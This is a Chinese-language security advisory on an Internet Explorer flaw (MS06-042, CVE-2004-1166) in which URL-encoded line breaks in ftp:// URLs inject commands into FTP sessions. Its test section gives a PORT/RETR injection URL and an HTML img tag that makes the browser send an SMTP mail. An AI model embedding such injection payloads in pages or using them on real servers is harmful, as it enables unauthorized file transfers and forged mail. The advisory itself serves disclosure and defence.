首页 -> 安全研究

安全研究

安全漏洞
Microsoft IE FTP URI处理任意FTP命令执行漏洞(MS06-042)

发布日期:2004-12-06
更新日期:2006-08-15

受影响系统:
Microsoft Internet Explorer 6.0 SP1
Microsoft Internet Explorer 6.0
Microsoft Internet Explorer 5.0.1 SP4
描述:
BUGTRAQ  ID: 11826
CVE(CAN) ID: CVE-2004-1166

Microsoft Internet Explorer是微软发布的非常流行的WEB浏览器。

Microsoft Internet Explorer对URI参数串的处理上存在漏洞,远程攻击者可能利用此漏洞在用户访问的FTP服务器上执行恶意命令。

Internet Explorer允许用户在地址栏中输入ftp://ftpuser:ftppass@server/directory 以访问登录FTP服务器。如果攻击者在FTP命令前加入URL编码的换行符(%0a)的话,就可以通过ftp:// URL向FTP会话中注入命令。但攻击者只能执行用户可以在FTP服务器上允许执行的操作。

<*来源:Albert Puigsech Galicia (ripe@7a69ezine.org
  
  链接:http://marc.theaimsgroup.com/?l=bugtraq&m=110253463305359&w=2
        http://www.microsoft.com/technet/security/bulletin/ms06-042.mspx
        http://www.us-cert.gov/cas/techalerts/TA06-220A.html
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

ftp://ftp.example.com/%0aPORT%20a,b,c,d,e,f%0aRETR%20/file

其中a、b、c、d、e、f代表IP地址和端口。

在HTML页面中嵌入以下图形还可以导致发送邮件:

<img src="username@mx.example.net:25/"" target="_blank">ftp://foo%0d%0aHELO%20mail%0d%0aMAIL%20FROM%3a&lt;&gt;%0d%0aRCPT%20TO%3a&lt;username%40example.com&gt;%0d%0aDATA%0d%0aSubject%3a%20hacked%0d%0aTo%3a%20username%40example.com%0d%0a%0d%0ahacked%0d%0a.%0d%0a:username@mx.example.net:25/" />

建议:
临时解决方法:

* 以纯文本读取邮件。

厂商补丁:

Microsoft
---------
Microsoft已经为此发布了一个安全公告(MS06-042)以及相应补丁:
MS06-042:Cumulative Security Update for Internet Explorer (918899)
链接:http://www.microsoft.com/technet/security/bulletin/ms06-042.mspx

浏览次数:4200
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障